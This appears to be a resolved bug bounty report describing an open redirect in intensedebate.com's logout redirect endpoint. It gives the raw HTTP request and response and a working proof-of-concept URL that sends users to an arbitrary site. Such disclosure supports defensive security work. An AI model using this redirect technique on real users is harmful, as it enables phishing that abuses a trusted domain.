[intensedebate.com] Open Redirect
None
A
Automattic
Submitted None
Actions:
Reported by
fuzzme
Vulnerability Details
Technical details and impact analysis
Hello
## Summary:
I have found a Open Redirect on `https://intensedebate.com//fb-connect/logoutRedir.php?goto=`, the parameters `$_GET['goto']` is reflected to the HTTP-Header Response `Location`
HTTP Request
```
GET /fb-connect/logoutRedir.php?goto=\http://\ HTTP/1.1
Host: intensedebate.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: y=y;
Upgrade-Insecure-Requests: 1
```
HTTP Response
```
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 03 Dec 2020 21:52:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: fbName=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: fbUrl=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: fbPic=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: \http://\
Content-Length: 0
```
## POC
1) Open this following link `http://intensedebate.com//fb-connect/logoutRedir.php?goto=https://www.google.fr` and you will be redirected to google.fr
Thank you, good bye
Fuzzme.
## Impact
An attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Open Redirect